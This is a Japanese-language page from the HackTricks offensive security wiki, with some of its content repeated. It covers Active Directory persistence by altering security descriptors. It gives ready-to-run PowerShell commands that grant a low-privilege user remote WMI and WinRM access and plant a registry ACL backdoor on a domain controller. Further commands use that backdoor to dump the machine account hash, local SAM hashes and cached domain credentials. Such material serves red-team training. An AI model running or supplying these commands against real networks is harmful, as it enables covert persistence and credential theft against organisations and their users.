Security Descriptors

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

セキュリティ記述子

ドキュメントから：セキュリティ記述子定義言語（SDDL）は、セキュリティ記述子を記述するために使用されるフォーマットを定義します。SDDLはDACLおよびSACLのためにACE文字列を使用します：ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

セキュリティ記述子は、オブジェクトがオブジェクトに対して持つ****権限を保存するために使用されます。オブジェクトのセキュリティ記述子に少しの変更を加えることができれば、そのオブジェクトに対して非常に興味深い特権を取得でき、特権グループのメンバーである必要はありません。

この永続性技術は、特定のオブジェクトに対して必要なすべての特権を獲得する能力に基づいており、通常は管理者特権を必要とするタスクを実行できるようにしますが、管理者である必要はありません。

WMIへのアクセス

ユーザーにリモートでWMIを実行するアクセスを与えることができますこれを使用して：

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

winrm PSコンソールへのアクセスをユーザーに与える これを使用して:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

ハッシュへのリモートアクセス

レジストリにアクセスし、DAMPを使用してハッシュをダンプし、Regバックドアを作成します。これにより、いつでもコンピュータのハッシュ、SAM、およびコンピュータ内の任意のキャッシュされたAD資格情報を取得できます。したがって、これはドメインコントローラコンピュータに対して一般ユーザーにこの権限を与えるのに非常に便利です。

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

チェック Silver Tickets で、ドメインコントローラーのコンピューターアカウントのハッシュをどのように使用できるかを学びましょう。

HackTricksをサポートする

サブスクリプションプランをチェックしてください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousResource-based Constrained Delegation NextSID-History Injection

Last updated 1 day ago

セキュリティ記述子

WMIへのアクセス

ユーザーにリモートでWMIを実行するアクセスを与えることができますこれを使用して：

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

winrm PSコンソールへのアクセスをユーザーに与える これを使用して:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

ハッシュへのリモートアクセス

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

チェック Silver Tickets で、ドメインコントローラーのコンピューターアカウントのハッシュをどのように使用できるかを学びましょう。

AWSハッキングを学び、練習する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、練習する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランをチェックしてください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。